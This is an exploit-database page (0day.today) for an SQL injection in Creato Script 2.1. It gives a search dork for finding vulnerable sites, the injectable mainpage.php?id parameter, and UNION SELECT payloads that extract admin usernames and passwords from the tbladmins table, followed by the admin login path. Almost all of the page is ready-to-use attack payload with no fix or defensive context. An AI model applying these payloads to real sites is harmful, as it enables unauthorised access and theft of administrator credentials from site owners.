[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Creato Script SQL Injection Vulnerability

Author
Mr.P3rfekT
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12462
Category
web applications
Date add
30-05-2010
Platform
php
=========================================
Creato Script SQL Injection Vulnerability
=========================================


# Title:  Creato Script SQL Injection Vulnerability
# Version: 2.1
# Author: Mr.P3rfekT
# Software Site:  http://www.creato.biz
# Tested on Lunix
# CVE : N/A
    
############### Founded By Mr.P3rfekT ###############
# Dork : " created by creato.biz "
 
 
# Helllo Allz.
    
    
# Exploit :
    
http://[site]/mainpage.php?id={SQLi}
 
 
 
# Poc Username:
 
union select 1,adminusername,3,4,5,6,7,8,9,10,11,12 from tbladmins--
 
 
# Poc Password:
 
# union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--
 
 
# Demo:
 
 http://[site]/mainpage.php?id=-6 union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--
  
# Admin Login
 
 
# http://[site]/admun/login.php
 
# ./done.
   
    
####################################################################



#  0day.today [2024-06-30]  #